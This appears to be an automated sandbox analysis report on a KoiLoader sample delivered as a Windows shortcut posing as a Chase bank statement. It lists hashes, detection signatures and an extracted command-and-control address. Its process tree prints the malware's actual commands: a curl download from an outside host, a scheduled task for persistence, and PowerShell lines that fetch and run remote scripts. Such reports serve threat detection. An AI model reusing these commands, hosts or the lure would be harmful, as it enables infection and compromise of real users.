Analysis
-
max time kernel
95s -
max time network
126s -
platform
windows10-2004_x64 -
resource
win10v2004-20240426-en -
resource tags
arch:x64arch:x86image:win10v2004-20240426-enlocale:en-usos:windows10-2004-x64system -
submitted
28-05-2024 01:36
Static task
static1
Behavioral task
behavioral1
Sample
Chasebank_Statement_May.lnk
Resource
win7-20240221-en
General
-
Target
Chasebank_Statement_May.lnk
-
Size
2KB
-
MD5
6bf403f2f1c9d8382fff6ed5a3041899
-
SHA1
922df103fec71861594dc918678ad6af27b14851
-
SHA256
7c8568685a386cfba733f330d0607fc54246801a6ccfc8b67c61acd11a0f695e
-
SHA512
d235396894b5c82b1a5d282959f65a00bc2dc021fbabf71746994239b14559db09c4ad3be80a9c70829df0bf197407e64a44b88989fd2d420cb98d03119463e8
Malware Config
Extracted
koiloader
http://5.255.127.243/parietals.php
-
payload_url
https://livingthemiraculouslife.com/assets/js
Signatures
-
Detects KoiLoader payload 1 IoCs
Processes:
resource yara_rule behavioral2/memory/3496-38-0x0000000007BD0000-0x0000000007BDD000-memory.dmp family_koi_loader -
Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) 1 IoCs
Processes:
resource yara_rule behavioral2/memory/3496-38-0x0000000007BD0000-0x0000000007BDD000-memory.dmp INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM -
Blocklisted process makes network request 2 IoCs
Processes:
powershell.exepowershell.exeflow pid process 26 2444 powershell.exe 27 3496 powershell.exe -
Checks computer location settings 2 TTPs 3 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
cmd.exewscript.EXEwscript.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-4018855536-2201274732-320770143-1000\Control Panel\International\Geo\Nation cmd.exe Key value queried \REGISTRY\USER\S-1-5-21-4018855536-2201274732-320770143-1000\Control Panel\International\Geo\Nation wscript.EXE Key value queried \REGISTRY\USER\S-1-5-21-4018855536-2201274732-320770143-1000\Control Panel\International\Geo\Nation wscript.exe -
Command and Scripting Interpreter: JavaScript 1 TTPs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Suspicious behavior: EnumeratesProcesses 4 IoCs
Processes:
powershell.exepowershell.exepid process 2444 powershell.exe 2444 powershell.exe 3496 powershell.exe 3496 powershell.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
Processes:
powershell.exepowershell.exedescription pid process Token: SeDebugPrivilege 2444 powershell.exe Token: SeDebugPrivilege 3496 powershell.exe -
Suspicious use of WriteProcessMemory 15 IoCs
Processes:
cmd.execmd.exewscript.EXEpowershell.exewscript.exedescription pid process target process PID 2212 wrote to memory of 1076 2212 cmd.exe cmd.exe PID 2212 wrote to memory of 1076 2212 cmd.exe cmd.exe PID 1076 wrote to memory of 4860 1076 cmd.exe curl.exe PID 1076 wrote to memory of 4860 1076 cmd.exe curl.exe PID 1076 wrote to memory of 3004 1076 cmd.exe schtasks.exe PID 1076 wrote to memory of 3004 1076 cmd.exe schtasks.exe PID 60 wrote to memory of 2444 60 wscript.EXE powershell.exe PID 60 wrote to memory of 2444 60 wscript.EXE powershell.exe PID 2444 wrote to memory of 3300 2444 powershell.exe schtasks.exe PID 2444 wrote to memory of 3300 2444 powershell.exe schtasks.exe PID 2444 wrote to memory of 1956 2444 powershell.exe wscript.exe PID 2444 wrote to memory of 1956 2444 powershell.exe wscript.exe PID 1956 wrote to memory of 3496 1956 wscript.exe powershell.exe PID 1956 wrote to memory of 3496 1956 wscript.exe powershell.exe PID 1956 wrote to memory of 3496 1956 wscript.exe powershell.exe -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Windows\system32\cmd.execmd /c C:\Users\Admin\AppData\Local\Temp\Chasebank_Statement_May.lnk1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:2212 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c curl -s -v -o j9KJ7gY13QnF.js "https://livingthemiraculouslife.com/assets/js/rosellateknP.php" & schtasks /create /f /sc minute /mo 1 /tr "wscript 'C:\Users\Admin\AppData\Local\Temp\j9KJ7gY13QnF.js' EhWX76T0MYGVrOQ" /tn EhWX76T0MYGVrOQ2⤵
- Suspicious use of WriteProcessMemory
PID:1076 -
C:\Windows\system32\curl.execurl -s -v -o j9KJ7gY13QnF.js "https://livingthemiraculouslife.com/assets/js/rosellateknP.php"3⤵PID:4860
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc minute /mo 1 /tr "wscript 'C:\Users\Admin\AppData\Local\Temp\j9KJ7gY13QnF.js' EhWX76T0MYGVrOQ" /tn EhWX76T0MYGVrOQ3⤵
- Creates scheduled task(s)
PID:3004
-
C:\Windows\system32\wscript.EXEC:\Windows\system32\wscript.EXE "C:\Users\Admin\AppData\Local\Temp\j9KJ7gY13QnF.js" EhWX76T0MYGVrOQ1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:60 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -com "IWR -useb 'https://livingthemiraculouslife.com/assets/js/resuscitativeir.php' -outf $env:tmp\MJA2W4B8IHZ9.js; schtasks /delete /tn EhWX76T0MYGVrOQ /f; wscript $env:tmp\MJA2W4B8IHZ9.js "2⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2444 -
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /delete /tn EhWX76T0MYGVrOQ /f3⤵PID:3300
-
C:\Windows\system32\wscript.exe"C:\Windows\system32\wscript.exe" C:\Users\Admin\AppData\Local\Temp\MJA2W4B8IHZ9.js3⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:1956 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -command "$env:paths = '7zC3QVSDQ25J'; IEX(IWR -UseBasicParsing 'https://livingthemiraculouslife.com/assets/js/upsetted41V1O.ps1'); $vv.SetValue($null, $true); IEX(IWR -UseBasicParsing 'https://livingthemiraculouslife.com/assets/js/uninfatuated5IkQ.ps1')"4⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3496
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1KB
MD5cd9644d108934f31c45cd03e3679b8e3
SHA1db35bcf066e42d07b96f2b73d15b6cfb216f94e0
SHA2568505e3afa46fc8e77079940c868d2963b2840b93cdc3da2b88c09ba4c4c8eb84
SHA5120af988a519fcf9c47afb00165d0cf0348b46d5ac43986bca5a1da4fb91f333d1b27ea64de7e95b27de7833ef7bda02e1eefcc3516b23eb9eb5ec8a3ece4f2e49
-
Filesize
1KB
MD52e117591da4bfa9da5a606ea899b83f8
SHA1501529d3442f31ec4a9a5c7b147ffcce64af383e
SHA2560a521c07c144960e70a7ef9df932f6d489dfe91a8218bfd2666b382b4fd5a57c
SHA512f3515f810eefdff7f69ba162b3f91f2e44b94e821ffdb7f5b17a83bb7c279da0b5c954d19915c04d473e38a87db33c4b5bc99d9fa04b7840b2cac92d8b972a41
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
277B
MD57986569b3a54a4779497f662e2ef41a0
SHA113e78e9004f9674b75138368f0fad35e0859e89f
SHA25665ad35f11ee6ab763fe2d5b99030e74f81d5233ea2ac0eba2e7e9db5ab31fce2
SHA51231b43099112142636657554d3e41564e7ab55c18f9aa5b910e0d929a3bf5dcce240ba4ff7b83cd754aa655e7118d2fc0d50ba9dff82f0b20c3a25db9498b1009